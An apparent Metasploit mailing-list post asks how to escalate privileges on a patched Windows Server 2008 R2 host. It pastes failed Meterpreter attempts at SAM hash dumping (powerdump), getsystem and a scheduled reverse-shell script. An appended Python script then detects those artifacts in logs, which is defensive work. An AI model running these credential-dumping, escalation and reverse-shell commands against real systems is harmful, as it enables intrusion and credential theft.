Metasploit mailing list archives

Powerdump / getsystem / privilege escalation on Windows 2008 R2
From: wfdawson <wfdawson () bellsouth net>
Date: Thu, 28 Apr 2011 09:49:22 -0700 (PDT)

Any hints on privilege escalation in Windows 2008 R2 fully patched as of today?
Target is Windows Server 2008 R2.

meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 57501.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...
[-] Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.

Getsystem fails, also.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

I suppose I simply do not have sufficient privilege for either...

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeChangeNotifyPrivilege

My attempt to set the PowerShell script restriction policy manually reflects that:

PS C:\> Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy : Access to the registry key 
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' is denied.
At line:1 char:20
+ Set-ExecutionPolicy <<<<  Unrestricted
    + CategoryInfo          : NotSpecified: (:) [Set-ExecutionPolicy], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand

meterpreter > run scheduleme -c "C:\\User\\Metasploit\\revshell.vbs" -i -u system
[*] Meterpreter is not running under sufficient administrative rights.

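An added detection-side example, not code from the post or from Metasploit: the session above leaves three host artifacts (a numerically named .ps1 dropped into %TEMP%, an attempt to set the execution policy to Unrestricted, and a denied write to the PowerShell ShellIds registry key), and the script below correlates those on constructed log lines. The log line shape, host field and rule names are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Rules keyed on the artifacts visible in the session above; the log format is an assumption.
RULES = {
    "temp_numeric_ps1": re.compile(r"\\Temp\\\d+\.ps1\b", re.I),  # 57501.ps1 dropped in %TEMP%
    "set_executionpolicy_unrestricted": re.compile(
        r"Set-ExecutionPolicy\s+(-ExecutionPolicy\s+)?Unrestricted", re.I),
    "shellids_key_denied": re.compile(  # non-admin write to the ShellIds key, as in the post
        r"PowerShell\\1\\ShellIds\\Microsoft\.PowerShell.*denied", re.I),
}
# Assumed line shape: 'YYYY-MM-DD HH:MM:SS host=NAME <message>'.
LINE_RE = re.compile(r"^(\S+ \S+) host=(\S+) (.*)$")

# Constructed sample lines (not from the post): three hits on one host plus benign noise.
SAMPLE_LOGS = [
    "2011-04-28 09:40:01 host=SRV01 FileCreate path=C:\\Users\\svc\\AppData\\Local\\Temp\\57501.ps1",
    "2011-04-28 09:40:03 host=SRV01 ProcessCreate cmd='powershell.exe Set-ExecutionPolicy Unrestricted'",
    "2011-04-28 09:40:03 host=SRV01 RegistryWrite key=HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell result=denied",
    "2011-04-28 11:15:00 host=WS07 ProcessCreate cmd='powershell.exe -File C:\\Scripts\\backup.ps1'",
]

def match_rules(message):
    """Names of every rule whose pattern appears in the message."""
    return [name for name, rx in RULES.items() if rx.search(message)]

def correlate(lines, window_seconds=300):
    """Map host -> sorted rule names for hosts where two or more distinct rules
    fire within window_seconds; a single isolated hit is treated as noise."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:  # malformed line: skip rather than abort the whole scan
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        hits[m.group(2)].extend((ts, name) for name in match_rules(m.group(3)))
    alerts = {}
    for host, events in hits.items():
        events.sort()
        for t0, _ in events:
            names = {n for t, n in events if 0 <= (t - t0).total_seconds() <= window_seconds}
            if len(names) >= 2:
                alerts[host] = sorted(names)
                break
    return alerts
```

Run against real process-creation, file-create and registry audit events, the same three rules would fire on a session like the one above even though every individual step failed.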
